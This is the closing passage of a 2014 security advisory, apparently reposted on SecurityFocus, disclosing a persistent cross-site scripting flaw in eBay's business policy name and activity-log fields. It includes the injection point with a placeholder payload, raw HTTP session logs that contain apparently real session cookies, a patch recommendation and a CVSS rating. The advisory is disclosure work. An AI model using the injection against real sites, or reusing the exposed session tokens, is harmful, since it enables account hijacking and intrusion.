lucky9=9393341; Domain=.ebay.com; Expires=Sat, 16-Mar-2019 18:00:03 GMT; Path=/]
Cache-Control[private]
Pragma[no-cache]
Content-Type[text/plain]
Content-Length[22]
Date[Mon, 17 Mar 2014 18:00:03 GMT]

PoC: Activity log: Return Policy 1 [x]

<div>
<h2 class="act-title">Activity log: <span id="policy_name">Return Policy 1 "><[PERSISTENT INJECTED SCRIPT CODES!]);"></span></h2>
<div id="activityLogContent" class="act-cnt">
<table cellpadding="0" cellspacing="0">
<thead><tr>
<th class="first">Date/Time</th>
<th class="second">Action</th>
<th class="third">Description</th>
<th class="fourth">Report</th>
</tr></thead></table>

Note: After the exploitation the active log serivce is also compromised.

--- PoC Session Logs [GET] ---
Status: 200[OK] GET http://www.bizpolicy.ebay.com/businesspolicy/x[PERSISTENT INJECTED SCRIPT CODE!]
Load Flags[LOAD_NORMAL] Grö�e des Inhalts[1201] Mime Type[text/html]
Request Header:
Host[www.bizpolicy.ebay.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://www.bizpolicy.ebay.com/businesspolicy/manage?totalPages=1
]
Cookie[ebay=%5Epsi%3DASTJiAAE*%5EsfLMD%3D1391608831%5Esbf%3D%23200000000
000c0048002004%5Ecos%3D1%5Ecv%3D15555%5Esin%3Din%5Ejs%3D1%5Edv%3D53273c5
5%5E; dp1=ba1p/053289001^bl/DE56e9a581^kms/in56e9a581^reg/%5EflagReg%3D1%5E56e
9a581^pcid/159931376355087201^mpc/0%7C7753346d81^pbf/%2340000000000081a8
8200000455087201^tzo/-3c53274c91^exc/0%3A0%3A0%3A0534ecb81^mms/0.53272b7
1.053288945^u1p/MjAxNC5rdW56bQ**55087201^u1f/Benjamin55087201^idm/153274
c6b^; s=BAQAAAUSucEmyAAWAAAEAClMoeF0yMDE0Lmt1bnptAAMAAVMokAEwAWUAAlMokAEjMgAGA
AFTKJABMACoAAFTKHhdMQFKABhTKJABNTMyNzM3YzAuMC4xLjExLjc4LjIuMC4yAAwAClMok
AExMjI1NjM3OTA2AO4AflMokAExBmh0dHA6Ly9teS5lYmF5LmNvbS93cy9lQmF5SVNBUEkuZ
GxsP015ZUJheSZteWViYXk9JnRva2VuaWQ9NDgmY3VycmVudHBhZ2U9TXllQmF5UHJlZmVyZ
W5jZXMmc3NwYWdlbmFtZT1zdWNjZXNzQWRQcmVmZXJlbmNlcwcAEgAKUyiQAXRlc3RDb29ra
WUA9AAiUyiQASQyJEFQS2hOWS9QJC51akNnREpDSGIudm1PbzV6TFJUejEA+AAgUyiQAWQwY
TVhZTQ1MTQ0MGE0MjhiMzgyZmUzMmZmZmZmZTg0ALgADFMnP60xMzk1MDc5MzUwOjAAPQAKU
yiQATIwMTQua3Vuem3M/bEjO3QgStCZxGHoMG4FWaj2Rg**; nonsession=BAQAAAUSucEmyAAaAAEAAClUIcgEyMDE0Lmt1bnptAWQAA1UIcgEjOGEABAAK
VQhaXTIwMTQua3Vuem0AygAgXI1AAWM3N2NmM2RmMTQ0MGEzNTg2YzI0NGFkNGZmZmZmZTRm
AMsAAlMnRYkyMQFMABhVCHIBNTMyNzM3YzAuMC4xLjExLjc4LjMuMC4yAU0AGFUIcgE1MzI3
M2RkMi4wLjEuMi4xMzYuMC4wLjIAEAAKVQhyATIwMTQua3Vuem0AMwAJVQhyATM0MTI4LERF
VQDzACJVCHIBJDIkQVBLaE5ZL1AkLnVqQ2dESkNIYi52bU9vNXpMUlR6MQC0AAFTJ+7wMACa
AAtTKcndMjAxNC5rdW56bW4AnAA4VQhyAW5ZK3NIWjJQckJtZGo2d1ZuWStzRVoyUHJBMmRq
NkFHa29lbkM1ZUxvUXFkajZ4OW5ZK3NlUT09AJ0ACFUIcgEwMDAwMDAwMYEG3noCCpfEtIJD
QA4W2mCUvROF; cssg=d0a5ae451440a428b382fe32fffffe84; cid=xAMhIMTTiG9hpoAp%231599313763; lucky9=9393341; npii=btguid/c77cf3df1440a3586c244ad4fffffe4f55087201^cguid/c77cfce61440a
56b23d61f96fe2e024155087201^; ds1=ats/1395074781098; ns1=BAQAAAUSucEmyAAaAAKUADVUIcgExMjI1NjM3OTA2LzA7Z/0uwdxIwLmpExj/Whb9VGX
z2oM*; secses=BAQAAAUSucEmyAAaAAUsAGFUIcgE1MzI3MzdjMC4wLjEuMTEuNzguMi4wLjJdgCSP
s+1ulBCbABPTM3Q2B4zn6g**; shs=BAQAAAUSucEmyAAaAAVUADlMwYV01MTYyMjA1MzEwMDQsM0lQMoD56FArTr0IRZNrcW0
RgsFk; JSESSIONID=D0F0865539CABCE246EB953E8860B953; ds2=asotr/b7qeZzzzzzzz^sotr/b7qeZzzzzzzz^]
Connection[keep-alive]
Response Header:
rlogid[t6al%7Cwliodz%3F%3Cwk%7D1e37e*%3B27c-144d14de1b3-0x96]
Content-Type[text/html;charset=utf-8]
Content-Length[1201]
Date[Mon, 17 Mar 2014 18:29:05 GMT]
Server[eBay Server]

Reference(s):
http://www.ebay.com/businesspolicy/
http://www.bizpolicy.ebay.com/businesspolicy/return
http://www.bizpolicy.ebay.com/businesspolicy/return?profileId=5284418601
5&mode=edit&catId=ALL&profileName=
http://www.bizpolicy.ebay.com/businesspolicy/return?totalPages=1&profile
Id=52844186015&pageNumber=1&source=manage
http://www.bizpolicy.ebay.com/businesspolicy/manage?pageNumber=1&totalPa
ges=1&context={%22status%22%3A%22success_edit_return%22}
http://www.bizpolicy.ebay.com/businesspolicy/return?totalPages=1&profile
Type=RETURN_POLICY&profileId=52844186015&pageNumber=1&source=manage
http://www.bizpolicy.ebay.com/businesspolicy/
http://www.bizpolicy.ebay.com/businesspolicy/manage?totalPages=1

Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure encode and parse of the vulnerable policy name item list and activity log name list.
Restrict the input field for special character and disallow wrong inputs by usage of a secure exception-handling to prevent exections.

Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the policy name & activity-log module is estimated as medium. (CVSS 4.0)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm (at) evolution-sec (dot) com [email concealed]) [www.vulnerability-lab.com]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin (at) vulnerability-lab (dot) com [email concealed] - research (at) vulnerability-lab (dot) com [email concealed] - admin (at) evolution-sec (dot) com [email concealed]
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin (at) vulnerability-lab (dot) com [email concealed] or research (at) vulnerability-lab (dot) com [email concealed]) to get a permission.

Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]�

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research (at) vulnerability-lab (dot) com [email concealed]
PGP KEY: http://www.vulnerability-lab.com/keys/admin (at) vulnerability-lab (dot) com [email concealed]%280x19
8E9928%29.txt

[ reply ]
 

Privacy Statement
Copyright 2010, SecurityFocus